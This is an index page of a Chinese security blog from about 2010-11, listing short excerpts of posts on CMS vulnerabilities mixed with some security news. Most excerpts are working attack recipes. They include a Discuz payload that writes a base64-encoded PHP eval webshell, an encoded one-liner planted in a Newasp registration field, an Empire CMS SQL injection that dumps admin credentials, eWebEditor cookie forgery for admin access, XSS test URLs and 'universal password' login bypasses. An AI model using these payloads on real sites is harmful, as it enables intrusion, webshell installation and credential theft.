河北网络安全博客

河北博客是一个关注网络安全、网站设计、网站推广、网站优化SEO、网站建设的河北地方博客。


[置顶] 关于河北博客【想了解河北博客的朋友请看这里】

[置顶] 站长朋友请看这里【永久置顶】

DZ!2.5 后台拿 WebShell 方法 DZ!2.5 后台拿 shell(图)

buger

        1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}  具体方法查看日志

河北博客:微软爆出一安全漏洞 9亿IE浏览器用户或受影响

buger

        微软公司目前还不能从根本上解决这个问题,不过已经发布了一个“自动修复”安全补丁,用于封堵各种恶意攻击。该公司28日还强调,该漏洞仅仅是一个严重威胁,还没有发现黑客利用它进行攻击的现象。

河北博客:某酒业网会员注册上传漏洞及修复

buger

发布日期:2011-01.29
漏洞类型:文件上传
文件:sub_upload.asp

河北博客:dircms XSS漏洞和利用方法及修复

buger

XSS漏洞文件:在线投稿功能

河北博客:最新DEDECMS 漏洞0day 影响版本(dede5.5、dede5.6)

buger

影响版本:dedecms5.5-5.6
官方网站:http://www.dedecms.com
漏洞类型:设计错误
漏洞代码:member\index_do.php

WEB站点安全评估 防范网页挂马攻击

buger

        对于一些大型网站来说,通常拥有一整套已经执行了的WEB站点安全防范解决方案,但是,为什么一些网站还是会被攻击者挂载木马?其中一个最主要的原因是已经实施的WEB站点安全解决方案只能够应对已经出现的安全漏洞和威胁。

z-blog 1.8 最新跨站XSS漏洞及修复方法

buger

漏洞文件:cmd.asp

新网被指存漏洞导致域名被盗 用户称考虑索赔

buger

11月17日消息,今日有域名界人士向TechWeb反映,众多在新网注册的CN域名被盗,包括51.cn、61.cn、168.cn、188.cn等极具价值的域名。域名界人士认为,被盗原因很可能是新网系统存在重大漏洞。

phpcms2008 sp3注入漏洞

buger

phpcms最新版注入漏洞 注入yp/company.php?where=%23
进入后台访问
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

ECShop 2.7.2 最新任意用户登陆漏洞0day

buger

     ECShop 2.7.2正式版的源代码, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台! 漏洞的影响 ECShop 2.7.2,ECShop 2.7.1 不受影响 漏洞的出现 漏洞出现在/include/init.php文件的512行左右, 代码如下

phpcms2008 yp.php 注入利用 Xday EXP

buger

测试方法: 保存以下代码为phpcms2008.php。安装php,进入php目录。执行php php2008.php localhost /yq 本地测试成功。

瑞星防火墙监测出华军软件园被挂马(附图)

buger

      被挂马页面1:http://www.onlinedown.net/soft/3011.htm  被挂马页面2:http://www.onlinedown.net/softdown/3011_2.htm  不知道这次是华军真的被挂马呢还是误报

游九(U9)网DOTA专题站搜索页跨站漏洞

buger

代码如下,括号任意内容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.kingwq.cn")</script>

UCHOME1.5 XSS漏洞

buger

测试代码: 需要先登入会员
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

MSN Editor 漏洞

buger

这个编辑器相当的简陋,下午拿站的时候碰到了一个,没有数据库备份,也没有什么可以直接上传webshell的地方,简陋到只有一个editor的界面。简单说下利用的方法吧。

新云4.0最新0day

buger

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

ewebeditor后台通杀漏洞

buger

今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
...

帝国CMS系统注入漏洞

buger

GG关键字:inurl:e/tool/gbook/?bid=1
主要填写您的姓名和联系邮箱这两处,其它的随便填。
您的姓名:縗\
联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后进行提交返回页面即爆出用户名密码。

Z-BLOG XSS Vulnerabilities漏洞

buger

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
...

PHP万能密码

buger

神秘小强&1943
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是

百分之百。

     可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了

PHP注入。

     其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。

     其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。

...

php+mysql如何爆页面绝对路径

buger

1、加引号’这个最常用 


2、变参数类型,比如把id=1改为id=a等 有时很有效果 


3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果 


4、text.php?aa[]=xx 


5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试. 

...
分页:1[2][3]

订阅河北博客

  • 订阅我的博客:订阅我的博客
  • 关注新浪微博:关注新浪微博
  • 关注腾讯微博:关注腾讯微博
  • google reader
  • 鲜果
  • 抓虾
  • QQ邮箱

河北博客站内搜索

河北博客相关链接

河北博客热文排行

Powered By kingwq's blog

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP备09002514号.Copyright www.kingwq.cn.2010